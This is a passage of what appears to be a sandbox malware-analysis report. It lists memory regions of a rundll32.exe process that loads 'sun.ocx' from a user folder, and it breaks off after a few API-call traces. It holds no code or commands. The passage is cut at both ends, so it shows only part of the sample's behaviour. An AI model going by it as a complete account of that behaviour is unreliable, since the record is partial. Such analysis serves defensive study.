= 1084 start_va = 0x76fe0000 end_va = 0x77026fff monitored = 0 entry_point = 0x76fe74c1 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 1085 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 1086 start_va = 0x7efe0000 end_va = 0x7f0dffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 1087 start_va = 0x7f0e0000 end_va = 0x7ffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 1088 start_va = 0x110000 end_va = 0x176fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1089 start_va = 0x72950000 end_va = 0x72b04fff monitored = 0 entry_point = 0x72a43d5a region_type = mapped_file name = "appvisvsubsystems32.dll" filename = "\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\AppvIsvSubsystems32.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvisvsubsystems32.dll") Region: id = 1090 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 1091 start_va = 0x72c50000 end_va = 0x72cb4fff monitored = 0 entry_point = 0x72c6fa6c region_type = mapped_file name = "appvisvstream32.dll" filename = "\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\AppvIsvStream32.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvisvstream32.dll") Region: id = 1092 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 1093 start_va = 0x72b80000 end_va = 0x72c4afff monitored = 0 entry_point = 0x72b96a2b region_type = mapped_file name = "c2r32.dll" filename = "\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\C2R32.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\c2r32.dll") Region: id = 1094 start_va = 0x76c20000 end_va = 0x76cbffff monitored = 0 entry_point = 0x76c349e5 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 1095 start_va = 0x76cc0000 end_va = 0x76d6bfff monitored = 0 entry_point = 0x76cca472 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 1096 start_va = 0x76900000 end_va = 0x76918fff monitored = 0 entry_point = 0x76904975 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 1097 start_va = 0x75bc0000 end_va = 0x75caffff monitored = 0 entry_point = 0x75bd0569 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 1098 start_va = 0x75530000 end_va = 0x7558ffff monitored = 0 entry_point = 0x7554a3b3 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 1099 start_va = 0x75520000 end_va = 0x7552bfff monitored = 0 entry_point = 0x755210e1 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 1100 start_va = 0x76e80000 end_va = 0x76fdbfff monitored = 0 entry_point = 0x76ecba3d region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 1101 start_va = 0x77240000 end_va = 0x772cffff monitored = 0 entry_point = 0x77256343 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 1102 start_va = 0x773b0000 end_va = 0x774affff monitored = 0 entry_point = 0x773cb6ed region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 1103 start_va = 0x75780000 end_va = 0x75789fff monitored = 0 entry_point = 0x757836a0 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\SysWOW64\\lpk.dll" (normalized: "c:\\windows\\syswow64\\lpk.dll") Region: id = 1104 start_va = 0x76ac0000 end_va = 0x76b5cfff monitored = 0 entry_point = 0x76af3fd7 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\SysWOW64\\usp10.dll" (normalized: "c:\\windows\\syswow64\\usp10.dll") Region: id = 1105 start_va = 0x75cb0000 end_va = 0x768f9fff monitored = 0 entry_point = 0x75d31601 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\SysWOW64\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll") Region: id = 1106 start_va = 0x771d0000 end_va = 0x77226fff monitored = 0 entry_point = 0x771e9ba6 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 1107 start_va = 0x72b60000 end_va = 0x72b76fff monitored = 0 entry_point = 0x72b61c9d region_type = mapped_file name = "userenv.dll" filename = "\\Windows\\SysWOW64\\userenv.dll" (normalized: "c:\\windows\\syswow64\\userenv.dll") Region: id = 1108 start_va = 0x743a0000 end_va = 0x743aafff monitored = 0 entry_point = 0x743a1992 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\SysWOW64\\profapi.dll" (normalized: "c:\\windows\\syswow64\\profapi.dll") Region: id = 1109 start_va = 0x775b0000 end_va = 0x775d9fff monitored = 0 entry_point = 0x775b12fa region_type = mapped_file name = "imagehlp.dll" filename = "\\Windows\\SysWOW64\\imagehlp.dll" (normalized: "c:\\windows\\syswow64\\imagehlp.dll") Region: id = 1110 start_va = 0x5b0000 end_va = 0x6cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005b0000" filename = "" Region: id = 1111 start_va = 0x6d0000 end_va = 0x857fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000006d0000" filename = "" Region: id = 1112 start_va = 0xc0000 end_va = 0xddfff monitored = 0 entry_point = 0xd158f region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 1113 start_va = 0xc0000 end_va = 0xddfff monitored = 0 entry_point = 0xd158f region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 1114 start_va = 0x76b90000 end_va = 0x76beffff monitored = 0 entry_point = 0x76ba158f region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 1115 start_va = 0x774b0000 end_va = 0x7757bfff monitored = 0 entry_point = 0x774b168b region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 1116 start_va = 0xc0000 end_va = 0xc0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "rundll32.exe.mui" filename = "\\Windows\\SysWOW64\\en-US\\rundll32.exe.mui" (normalized: "c:\\windows\\syswow64\\en-us\\rundll32.exe.mui") Region: id = 1117 start_va = 0x860000 end_va = 0x9e0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000860000" filename = "" Region: id = 1118 start_va = 0x9f0000 end_va = 0x1deffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000009f0000" filename = "" Region: id = 1119 start_va = 0xd0000 end_va = 0xd0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000d0000" filename = "" Region: id = 1120 start_va = 0xe0000 end_va = 0xe0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 1121 start_va = 0x73340000 end_va = 0x73342fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "api-ms-win-core-synch-l1-2-0.dll" filename = "\\Windows\\SysWOW64\\api-ms-win-core-synch-l1-2-0.dll" (normalized: "c:\\windows\\syswow64\\api-ms-win-core-synch-l1-2-0.dll") Region: id = 1122 start_va = 0x1df0000 end_va = 0x20befff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 1123 start_va = 0x180000 end_va = 0x180fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\SysWOW64\\tzres.dll" (normalized: "c:\\windows\\syswow64\\tzres.dll") Region: id = 1124 start_va = 0x190000 end_va = 0x196fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\tzres.dll.mui") Region: id = 1125 start_va = 0x180000 end_va = 0x180fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\SysWOW64\\tzres.dll" (normalized: "c:\\windows\\syswow64\\tzres.dll") Region: id = 1126 start_va = 0x190000 end_va = 0x196fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\tzres.dll.mui") Region: id = 1127 start_va = 0x180000 end_va = 0x180fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000180000" filename = "" Region: id = 1128 start_va = 0x190000 end_va = 0x19dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000190000" filename = "" Region: id = 1129 start_va = 0x6fff0000 end_va = 0x6fffffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000006fff0000" filename = "" Region: id = 1137 start_va = 0x757f0000 end_va = 0x7587efff monitored = 0 entry_point = 0x757f3fb1 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll") Region: id = 1148 start_va = 0x20c0000 end_va = 0x226ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000020c0000" filename = "" Region: id = 1149 start_va = 0x190000 end_va = 0x1f7fff monitored = 1 entry_point = 0x191470 region_type = mapped_file name = "sun.ocx" filename = "\\Users\\kEecfMwgj\\sun.ocx" (normalized: "c:\\users\\keecfmwgj\\sun.ocx") Region: id = 1150 start_va = 0x190000 end_va = 0x1f7fff monitored = 1 entry_point = 0x191470 region_type = mapped_file name = "sun.ocx" filename = "\\Users\\kEecfMwgj\\sun.ocx" (normalized: "c:\\users\\keecfmwgj\\sun.ocx") Region: id = 1151 start_va = 0x190000 end_va = 0x1f7fff monitored = 1 entry_point = 0x191470 region_type = mapped_file name = "sun.ocx" filename = "\\Users\\kEecfMwgj\\sun.ocx" (normalized: "c:\\users\\keecfmwgj\\sun.ocx") Region: id = 1152 start_va = 0x190000 end_va = 0x190fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000190000" filename = "" Region: id = 1153 start_va = 0x6ab00000 end_va = 0x6ab5ffff monitored = 1 entry_point = 0x6ab01470 region_type = mapped_file name = "sun.ocx" filename = "\\Users\\kEecfMwgj\\sun.ocx" (normalized: "c:\\users\\keecfmwgj\\sun.ocx") Region: id = 1154 start_va = 0x2270000 end_va = 0x81cefff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002270000" filename = "" Region: id = 1521 start_va = 0x1a0000 end_va = 0x1c3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 1522 start_va = 0x1d0000 end_va = 0x1effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 1523 start_va = 0x5b0000 end_va = 0x6affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005b0000" filename = "" Region: id = 1524 start_va = 0x6c0000 end_va = 0x6cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006c0000" filename = "" Region: id = 1525 start_va = 0x10000000 end_va = 0x10026fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000010000000" filename = "" Region: id = 1526 start_va = 0x741b0000 end_va = 0x7422ffff monitored = 0 entry_point = 0x741c37c9 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll") Region: id = 1527 start_va = 0x2270000 end_va = 0x243ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002270000" filename = "" Region: id = 1528 start_va = 0x270000 end_va = 0x34efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000270000" filename = "" Region: id = 1529 start_va = 0x74170000 end_va = 0x74182fff monitored = 0 entry_point = 0x74171d3f region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\SysWOW64\\dwmapi.dll" (normalized: "c:\\windows\\syswow64\\dwmapi.dll") Region: id = 1530 start_va = 0x67df0000 end_va = 0x67e06fff monitored = 0 entry_point = 0x67df35fa region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\SysWOW64\\bcrypt.dll" (normalized: "c:\\windows\\syswow64\\bcrypt.dll") Region: id = 1531 start_va = 0x75650000 end_va = 0x75770fff monitored = 0 entry_point = 0x7565158e region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\SysWOW64\\crypt32.dll" (normalized: "c:\\windows\\syswow64\\crypt32.dll") Region: id = 1532 start_va = 0x76d70000 end_va = 0x76d7bfff monitored = 0 entry_point = 0x76d7238e region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\SysWOW64\\msasn1.dll" (normalized: "c:\\windows\\syswow64\\msasn1.dll") Region: id = 1533 start_va = 0x75a80000 end_va = 0x75bb5fff monitored = 0 entry_point = 0x75a81b35 region_type = mapped_file name = "urlmon.dll" filename = "\\Windows\\SysWOW64\\urlmon.dll" (normalized: "c:\\windows\\syswow64\\urlmon.dll") Region: id = 1534 start_va = 0x76d80000 end_va = 0x76e74fff monitored = 0 entry_point = 0x76d81865 region_type = mapped_file name = "wininet.dll" filename = "\\Windows\\SysWOW64\\wininet.dll" (normalized: "c:\\windows\\syswow64\\wininet.dll") Region: id = 1535 start_va = 0x75880000 end_va = 0x75a7afff monitored = 0 entry_point = 0x758822d9 region_type = mapped_file name = "iertutil.dll" filename = "\\Windows\\SysWOW64\\iertutil.dll" (normalized: "c:\\windows\\syswow64\\iertutil.dll") Region: id = 1536 start_va = 0x6fa20000 end_va = 0x6fa2cfff monitored = 0 entry_point = 0x6fa211e0 region_type = mapped_file name = "wtsapi32.dll" filename = "\\Windows\\SysWOW64\\wtsapi32.dll" (normalized: "c:\\windows\\syswow64\\wtsapi32.dll") Region: id = 1537 start_va = 0x67db0000 end_va = 0x67decfff monitored = 0 entry_point = 0x67db10f5 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 1538 start_va = 0x1f0000 end_va = 0x1f1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001f0000" filename = "" Region: id = 1539 start_va = 0x430000 end_va = 0x46ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000430000" filename = "" Region: id = 1540 start_va = 0x4b0000 end_va = 0x5affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004b0000" filename = "" Region: id = 1541 start_va = 0x21d0000 end_va = 0x220ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000021d0000" filename = "" Region: id = 1542 start_va = 0x2230000 end_va = 0x226ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002230000" filename = "" Region: id = 1543 start_va = 0x745f0000 end_va = 0x7478dfff monitored = 0 entry_point = 0x7461e6b5 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll") Region: id = 1544 start_va = 0x7efd8000 end_va = 0x7efdafff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efd8000" filename = "" Region: id = 1545 start_va = 0x200000 end_va = 0x200fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "windowsshell.manifest" filename = "\\Windows\\WindowsShell.Manifest" (normalized: "c:\\windows\\windowsshell.manifest") Region: id = 1546 start_va = 0x210000 end_va = 0x211fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000210000" filename = "" Region: id = 1547 start_va = 0x200000 end_va = 0x200fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000200000" filename = "" Region: id = 1548 start_va = 0x2150000 end_va = 0x218ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002150000" filename = "" Region: id = 1549 start_va = 0x2350000 end_va = 0x238ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002350000" filename = "" Region: id = 1550 start_va = 0x2400000 end_va = 0x243ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002400000" filename = "" Region: id = 1551 start_va = 0x7efd5000 end_va = 0x7efd7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efd5000" filename = "" Region: id = 1552 start_va = 0x77320000 end_va = 0x773a2fff monitored = 0 entry_point = 0x773223d2 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\SysWOW64\\clbcatq.dll" (normalized: "c:\\windows\\syswow64\\clbcatq.dll") Region: id = 1553 start_va = 0x220000 end_va = 0x220fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000220000" filename = "" Region: id = 1554 start_va = 0x2440000 end_va = 0x839efff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002440000" filename = "" Region: id = 1571 start_va = 0x3d0000 end_va = 0x3f3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000003d0000" filename = "" Region: id = 1572 start_va = 0x400000 end_va = 0x426fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 1573 start_va = 0x73ea0000 end_va = 0x73f94fff monitored = 0 entry_point = 0x73eb0d9e region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\SysWOW64\\propsys.dll" (normalized: "c:\\windows\\syswow64\\propsys.dll") Region: id = 1574 start_va = 0x77030000 end_va = 0x771ccfff monitored = 0 entry_point = 0x770317e7 region_type = mapped_file name = "setupapi.dll" filename = "\\Windows\\SysWOW64\\setupapi.dll" (normalized: "c:\\windows\\syswow64\\setupapi.dll") Region: id = 1575 start_va = 0x77580000 end_va = 0x775a6fff monitored = 0 entry_point = 0x775858b9 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\SysWOW64\\cfgmgr32.dll" (normalized: "c:\\windows\\syswow64\\cfgmgr32.dll") Region: id = 1576 start_va = 0x76bf0000 end_va = 0x76c01fff monitored = 0 entry_point = 0x76bf1441 region_type = mapped_file name = "devobj.dll" filename = "\\Windows\\SysWOW64\\devobj.dll" (normalized: "c:\\windows\\syswow64\\devobj.dll") Region: id = 1577 start_va = 0x470000 end_va = 0x47cfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "setupapi.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\setupapi.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\setupapi.dll.mui") Region: id = 1578 start_va = 0x74370000 end_va = 0x74390fff monitored = 0 entry_point = 0x7437145e region_type = mapped_file name = "ntmarta.dll" filename = "\\Windows\\SysWOW64\\ntmarta.dll" (normalized: "c:\\windows\\syswow64\\ntmarta.dll") Region: id = 1579 start_va = 0x772d0000 end_va = 0x77314fff monitored = 0 entry_point = 0x772d11e1 region_type = mapped_file name = "wldap32.dll" filename = "\\Windows\\SysWOW64\\Wldap32.dll" (normalized: "c:\\windows\\syswow64\\wldap32.dll") Region: id = 1580 start_va = 0x480000 end_va = 0x483fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.1.db" filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Caches\\cversions.1.db" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\caches\\cversions.1.db") Region: id = 1581 start_va = 0x490000 end_va = 0x4a6fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000007.db" filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Caches\\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x0000000000000007.db" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\caches\\{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000007.db") Region: id = 1582 start_va = 0x6b0000 end_va = 0x6b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000006b0000" filename = "" Region: id = 1583 start_va = 0x2290000 end_va = 0x22cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002290000" filename = "" Region: id = 1584 start_va = 0x2310000 end_va = 0x234ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002310000" filename = "" Region: id = 1585 start_va = 0x7efad000 end_va = 0x7efaffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efad000" filename = "" Region: id = 1586 start_va = 0x2440000 end_va = 0x839efff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002440000" filename = "" Region: id = 1589 start_va = 0x20c0000 end_va = 0x20e3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000020c0000" filename = "" Region: id = 1590 start_va = 0x20f0000 end_va = 0x2116fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000020f0000" filename = "" Region: id = 1591 start_va = 0x200000 end_va = 0x200fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000200000" filename = "" Region: id = 1592 start_va = 0x480000 end_va = 0x480fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000480000" filename = "" Region: id = 1593 start_va = 0x480000 end_va = 0x480fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000480000" filename = "" Region: id = 1594 start_va = 0x480000 end_va = 0x480fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000480000" filename = "" Region: id = 1595 start_va = 0x480000 end_va = 0x480fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000480000" filename = "" Region: id = 1596 start_va = 0x480000 end_va = 0x480fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000480000" filename = "" Region: id = 1597 start_va = 0x480000 end_va = 0x480fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000480000" filename = "" Region: id = 1598 start_va = 0x480000 end_va = 0x483fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 1599 start_va = 0x2120000 end_va = 0x214ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x000000000000000e.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x000000000000000e.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x000000000000000e.db") Region: id = 1600 start_va = 0x2190000 end_va = 0x2193fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 1601 start_va = 0x2390000 end_va = 0x23f5fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000002.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db") Region: id = 1602 start_va = 0x2440000 end_va = 0x249bfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "shell32.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\shell32.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\shell32.dll.mui") Region: id = 1603 start_va = 0x74060000 end_va = 0x74076fff monitored = 0 entry_point = 0x74063573 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\SysWOW64\\cryptsp.dll" (normalized: "c:\\windows\\syswow64\\cryptsp.dll") Region: id = 1604 start_va = 0x22d0000 end_va = 0x230bfff monitored = 0 entry_point = 0x22d128d region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 1605 start_va = 0x22d0000 end_va = 0x230bfff monitored = 0 entry_point = 0x22d128d region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 1606 start_va = 0x22d0000 end_va = 0x230bfff monitored = 0 entry_point = 0x22d128d region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 1607 start_va = 0x22d0000 end_va = 0x230bfff monitored = 0 entry_point = 0x22d128d region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 1608 start_va = 0x22d0000 end_va = 0x230bfff monitored = 0 entry_point = 0x22d128d region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 1609 start_va = 0x74020000 end_va = 0x7405afff monitored = 0 entry_point = 0x7402128d region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 1610 start_va = 0x74190000 end_va = 0x7419dfff monitored = 0 entry_point = 0x74191235 region_type = mapped_file name = "rpcrtremote.dll" filename = "\\Windows\\SysWOW64\\RpcRtRemote.dll" (normalized: "c:\\windows\\syswow64\\rpcrtremote.dll") Region: id = 1611 start_va = 0x21a0000 end_va = 0x21aafff monitored = 0 entry_point = 0x21a178c region_type = mapped_file name = "rundll32.exe" filename = "\\Windows\\SysWOW64\\rundll32.exe" (normalized: "c:\\windows\\syswow64\\rundll32.exe") Region: id = 1629 start_va = 0x24e0000 end_va = 0x251ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000024e0000" filename = "" Region: id = 1630 start_va = 0x2560000 end_va = 0x259ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002560000" filename = "" Region: id = 1631 start_va = 0x7efaa000 end_va = 0x7efacfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efaa000" filename = "" Region: id = 1632 start_va = 0x25a0000 end_va = 0x84fefff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000025a0000" filename = "" Region: id = 1737 start_va = 0x21a0000 end_va = 0x21c3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000021a0000" filename = "" Region: id = 1738 start_va = 0x22d0000 end_va = 0x22f6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000022d0000" filename = "" Thread: id = 42 os_tid = 0xd9c [0092.541] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x26f13c | out: lpSystemTimeAsFileTime=0x26f13c*(dwLowDateTime=0x76bd40a0, dwHighDateTime=0x1d806e7)) [0092.541] GetCurrentProcessId () returned 0xd98 [0092.541] GetCurrentThreadId () returned 0xd9c [0092.541] GetTickCount () returned 0x1b32100 [0092.541] QueryPerformanceCounter (in: lpPerformanceCount=0x26f144 | out: lpPerformanceCount=0x26f144*=2865609155997) returned 1 [0092.542] malloc (_Size=0x80) returned 0x6c2760 [0092.542] __dllonexit () returned 